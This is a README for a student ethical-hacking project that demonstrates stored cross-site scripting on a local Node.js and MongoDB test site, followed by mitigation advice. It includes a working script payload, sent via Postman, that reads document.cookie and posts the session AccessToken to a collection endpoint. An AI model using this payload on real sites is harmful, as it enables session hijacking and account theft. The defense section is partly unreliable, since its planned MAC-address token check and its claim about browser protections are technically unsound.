
Script injection and stealing client cookie, ethical hacking course project, Dec-2023


Sajjad-Hasan01/eHack-XSS


Script Injection and stealing Client Cookie

Ethical Hacking course project by @Sajjad-Hasan01, Dec-2023

Introduction

These days there are many ways to steal clients' information; one of them is Cross-Site Scripting (XSS) combined with database injection. In this project I present the easiest way to pass a script command through an input field, and the basics of avoiding these issues.

Problem Statement

When an attacker can write any command into a regular input field and have it accepted, this is a very serious issue, because the attacker can exploit the vulnerability in malicious ways. In one such scenario, the attacker injects a script that takes the client's cookies from the browser window and sends them to the attacker's database.

The cookies may contain the AccessToken of the client's session, which lets the attacker open the client's account. I will discuss the solution to this problem later.

This is a general problem. In this project I implement it practically, using Node.js as the JavaScript runtime environment, MongoDB as the database, and Postman as the client for sending and receiving HTTP requests; all services run locally. We will see it in the next section.

Problem Test

First, sign up and log in to the local test website: [screenshots 1-4]

Now I will try to exploit the Add Comment field to pass an injection: [screenshots 5-8]

As you can see in the second and fourth images, the script works and the browser shows the alerts.

If the client side catches the script and converts it to a normal string or rejects it, there is another way: pass it directly to the API using Postman. First, I need to get the Add-Comment API link:

From the browser developer tools, I tried to get the request link from the Network tab, but after every button click the page refreshed itself. [screenshots 9-11] The Add-Comment API link is http://localhost:3000/api/addcomment, and the body of the request is comment.

In Postman, I sent a body containing a script that takes the cookies from the client's browser window and sends them to a database collection:

```html
<script>
    // Stored-XSS test payload: read the cookies visible to the page and
    // POST them as JSON to the /api/xss collection endpoint.
    (() => {
        fetch('http://localhost:3000/api/xss', {
            method: 'POST',
            headers: {
                "Content-Type": "application/json",
            },
            body: JSON.stringify({
                token: document.cookie
            })
        })
    })()
</script>
```

[screenshot 12] The response status was OK, and after refreshing the Home page it displayed another empty comment, which was my Send-Cookie script. Finally, I got the cookie containing the AccessToken in the Tokens collection of the eHackXss database:

[screenshot 13]

Problem Solution

To avoid NoSQL injection, we have to use the mongoose npm package rather than mongodb, together with express-mongo-sanitize; helmet for secure HTTP headers; xss-clean for data sanitization against site scripts; and Yup for input validation on the server. The latest browser versions also have good defenses against scripts, so nowadays it is difficult to run any script in a browser window.
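As an added example (not part of the project's code), the snippet below shows two of the defenses behind the packages listed above in plain Node.js: HTML-encoding a stored comment on output, so the injected `<script>` from the test is displayed as text instead of executed, and issuing the session cookie with HttpOnly so `document.cookie` cannot read it. Function names are hypothetical; the cookie name AccessToken follows this README.

```javascript
// Added example, not the eHack-XSS project's own code.
// Encode the five characters that let text break out of an HTML text node
// or attribute value.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable rendering: the stored comment is concatenated into the page
// as-is, so a stored <script> tag reaches the browser intact.
function renderCommentVulnerable(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Hardened rendering: the same comment, encoded at output time.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Build a Set-Cookie header value for the session token. HttpOnly keeps the
// value out of document.cookie; Secure and SameSite=Strict limit where the
// browser sends it. Cookie name "AccessToken" follows the README (assumption).
function sessionCookie(token) {
  if (!/^[A-Za-z0-9._-]+$/.test(token)) {
    throw new Error('token contains characters not allowed in a cookie value');
  }
  return `AccessToken=${token}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Constructed sample comment, the same shape as the alert test in this README.
const INJECTED_COMMENT = '<script>alert(document.cookie)</script>';

console.log(renderCommentVulnerable(INJECTED_COMMENT)); // script tag survives
console.log(renderCommentSafe(INJECTED_COMMENT));       // shown as &lt;script&gt;...
console.log(sessionCookie('example-token-value'));
```

With HttpOnly set, the page's `document.cookie` payload returns an empty string for the session cookie even if a script does get stored, so the two defenses cover each other.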

Later, I will upgrade the project with an AccessToken that cannot be reused by an attacker: it will contain the AccountID and the MAC address of the user's device. When an attacker obtains the AccessToken and tries to use it, the server will receive the attacker's MAC address, extract the legitimate user's MAC address from the AccessToken, and compare the two.
